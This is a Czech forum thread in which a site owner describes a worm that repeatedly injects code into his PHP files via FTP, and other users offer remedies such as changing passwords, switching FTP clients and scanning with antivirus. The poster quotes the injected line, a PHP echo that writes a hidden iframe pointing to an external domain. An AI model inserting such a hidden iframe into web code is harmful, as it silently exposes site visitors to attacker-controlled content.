Autor Zpráva
Ghosting
Profil
Zdravím
mám trochu větší problém s jakýmsi červem.
Mění mi soubory na FTP, (většinou index.php a jazykové soubory, bohudík jen ty), infikované soubory jsem změnil/opravil, hesla do FTP taktéž.
Problém je v tom že se problém objevuje znovu. Hesla si neukládám nikam do PC, z toho jsem se poučil, škodlivý kód se vkládá na konci PHP kódu
před ?>

Většinou toto
echo "<iframe src=\"http://xtrarobotz.com/?click=12028DC\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";


PC jsem prohledal antivirem (Avast), nainstaloval Keyholder ale jak je vidmo, něják to nepomáhá.
Ptám se tedy, má někdo s tímto druhem viru zkušenosti, stalo se to někomu?
Jan Tvrdík
Profil
Ghosting:
Zkušenosti nemám, ale zkus
1. heslo znovu změnit
2. změnit FTP klienta za jiného
armin
Profil
Ghosting: Ahoj, prubni si projet PC comodo antivirem, je zdarma i pro komerční účely. Pokud vím, tak nod32 a podobná "elita" zatím není schopna tento vir odhalit - alespoň já řešil minulý týden x "stížností" v podobě modifikaci souborů na ftp, přičemž poškozené strany měli řádně zakoupený antivirus (a zcela zbytečně, jak už to tak bývá...) a PC "měli čistý". Jinak aby to nevyznělo divně, jedná se o globální problém, co znám kolegy a známé, týče se to všech hostingů.
Ghosting
Profil
armin
Díky za link. Určo zkusím. Mě přišel taky email od Gigahostingu, kde doporučovali jiný klient než TC, asi to bude lítat i jinde.
nightfish
Profil
btw Total Commaner ve včera vydané betaverzi podporuje "lepší" šifrování (AES) hesel k FTP
armin
Profil
Ghosting: Bohužel u Total Commandru se moc neřešila bezpečnost co se týče FTP přístupů, nicméně, tak jak praví kolega nightfish - od verze 7.50 je již možné řadit FTP účty do skupin a pro každou skupinu si zvolit "vlastní heslo", tedy nebude to již jak na dlani. Bohužel se k takovýmto krokům přistoupilo podle mě hodně pozdě. Více info zde:
http://cdr.cz/a/26853

// edit
Osobně bych nedoporučoval zkoušet betu, raději počkat týden dva a upgradnout na finální verzi.
Ghosting
Profil
Hesla už raději neukládám. :)
Spíše nechápu proč se ten kód tam vkládá, co tím autor sleduje?

Vaše odpověď

Mohlo by se hodit

Příspěvky nesouvisející s webem budou odstraněny.

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: